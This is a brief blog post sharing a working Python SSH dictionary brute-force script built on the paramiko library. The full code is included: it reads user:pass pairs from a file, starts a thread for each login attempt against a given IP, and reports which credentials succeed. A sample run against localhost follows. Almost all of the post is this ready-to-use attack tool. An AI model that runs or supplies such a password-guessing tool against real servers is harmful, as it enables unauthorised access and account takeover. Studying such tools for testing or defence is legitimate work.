So I got bored this evening and decided to write a quick and simple python SSH bruteforcer (I wanted to learn how to use paramiko).
It takes the dictionary in a user:pass format.
It’s not the most efficient as it uses a sleep (300ms) function, if i get the time to play i’ll use some form of thread queuing to ensure that you can throttle the requests. Might also be useful to reattempt SSH connect failures in order to ensure there are no missed attempts.
But here it is anyway:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | #!/usr/bin/env python import paramiko, sys, time, threading if len(sys.argv) < 3: print "Usage: %s IP /path/to/dictionary" % (str(sys.argv[0])) print "Example: %s 10.0.0.1 dict.txt" % (str(sys.argv[0])) print "Dictionary should be in user:pass format" sys.exit(1) ip=sys.argv[1]; filename=sys.argv[2] fd = open(filename, "r") def attempt(IP,UserName,Password): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(IP, username=UserName, password=Password) except paramiko.AuthenticationException: print '[-] %s:%s fail!' % (UserName, Password) else: print '[!] %s:%s is CORRECT!' % (UserName, Password) ssh.close() return print '[+] Bruteforcing against %s with dictionary %s' % (ip, filename) for line in fd.readlines(): username, password = line.strip().split(":") t = threading.Thread(target=attempt, args=(ip,username,password)) t.start() time.sleep(0.3) fd.close() sys.exit(0) |
And the running of the code:
1 2 3 4 5 6 7 8 9 10 11 12 | user@linux:$ python ssh-dict.py 127.0.0.1 dict [+] Bruteforcing against 127.0.0.1 with dictionary dict [-] user:pass fail! [-] admin:password fail! [-] guest:password1 fail! [-] kerry:test fail! ##### SNIP [-] user5:password6 fail! [-] user5:password7 fail! [!] validuser:validpassword is CORRECT! [-] user5:password8 fail! ##### SNIP |
Leave a Reply
You must be logged in to post a comment.